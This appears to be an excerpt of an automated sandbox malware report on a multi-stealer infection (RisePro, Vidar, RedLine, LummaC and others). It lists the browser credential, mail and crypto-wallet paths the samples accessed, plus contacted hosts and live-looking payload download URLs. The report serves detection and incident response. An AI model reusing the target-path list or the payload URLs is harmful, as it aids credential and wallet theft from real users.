Source: Yara match	File source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RJ0JeM9uj2rfsuq_woBmmIY.exe PID: 7816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: ~PColumnMasterKey_KeyStoreProviderNameNameP~PColumnMasterKey_KeyStoreProviderNameDescp~FSecurityPredicate_PredicateTypeDesc
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Searches for user specific document files

Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe

Directory queried: C:\Users\user\Documents

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.pRIMqfuwRZ49ldgjUZ_z2py6.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2417687969.0000000004648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wDFs1SzoVQiT2__nQmbIm6Rg.exe PID: 7800, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416770410.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416630360.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2418840174.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hvkESMr10WtP7_E6btIJmDx0.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZzpT5hwyVjlAXfLjB1r1iwOX.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Jl9_JMpull8yLuWoc7AXV8O.zip, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000031.00000002.3127540718.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3128895190.0000000000A71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: softjenimmp3converter.exe PID: 3992, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RJ0JeM9uj2rfsuq_woBmmIY.exe PID: 7816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.233.132.139	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
37.221.125.202	f.123654987.xyz	Lithuania	62416	PTSERVIDORPT	true
95.217.245.42	unknown	Germany	24940	HETZNER-ASDE	false
104.21.82.182	carthewasher.net	United States	13335	CLOUDFLARENETUS	false
193.233.132.253	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
172.67.132.113	iplogger.org	United States	13335	CLOUDFLARENETUS	false
5.42.65.96	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
95.142.206.0	sun6-20.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.2	sun6-22.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
147.45.47.93	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
102.189.102.216	pofix.red	Egypt	24835	RAYA-ASEG	false
95.142.206.1	sun6-21.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
172.67.147.32	iplis.ru	United States	13335	CLOUDFLARENETUS	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
104.21.32.111	sextipolar.sbs	United States	13335	CLOUDFLARENETUS	false
172.67.144.181	zanzibarpivo.com	United States	13335	CLOUDFLARENETUS	false
104.26.4.15	db-ip.com	United States	13335	CLOUDFLARENETUS	false
104.21.55.189	cheremushki.net	United States	13335	CLOUDFLARENETUS	false
172.67.75.163	api.myip.com	United States	13335	CLOUDFLARENETUS	false
104.104.85.160	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
93.186.225.194	vk.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
172.67.180.119	triedchicken.net	United States	13335	CLOUDFLARENETUS	false
5.42.66.10	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
172.67.162.121	dod.fastbutters.com	United States	13335	CLOUDFLARENETUS	false
45.130.41.108	monoblocked.com	Russian Federation	198610	BEGET-ASRU	false

Contacted Domains

Name	IP	Active
chrome.cloudflare-dns.com	172.64.41.3	true
monoblocked.com	45.130.41.108	true
sun6-21.userapi.com	95.142.206.1	true
sextipolar.sbs	104.21.32.111	true
iplogger.org	172.67.132.113	true
f.123654987.xyz	37.221.125.202	true
sun6-20.userapi.com	95.142.206.0	true
api.myip.com	172.67.75.163	true
carthewasher.net	104.21.82.182	true
steamcommunity.com	104.104.85.160	true
pofix.red	102.189.102.216	true
cskuxgp.net	45.88.90.160	true
dod.fastbutters.com	172.67.162.121	true
ipinfo.io	34.117.186.192	true
cheremushki.net	104.21.55.189	true
sun6-22.userapi.com	95.142.206.2	true
zanzibarpivo.com	172.67.144.181	true
www.google.com	142.251.163.104	true
triedchicken.net	172.67.180.119	true
db-ip.com	104.26.4.15	true
vk.com	93.186.225.194	true
iplis.ru	172.67.147.32	true
ntp.msn.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199680449169	false		high
https://sun6-20.userapi.com/c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ	false		high
https://cheremushki.net/038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe	false	Avira URL Cloud: safe	unknown
http://sextipolar.sbs/qwqw	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vk.com/doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap	false		high
https://ipinfo.io/widget/demo/149.18.24.96	false		high
https://vk.com/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12	false		high
https://sun6-22.userapi.com/c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c	false		high
